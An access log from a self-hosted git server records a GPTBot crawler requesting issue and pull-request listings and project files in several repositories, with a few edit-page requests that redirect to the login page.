git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13255] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:19:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11367] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10087] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10263] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10260] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 2071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13110] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13272] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:06:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 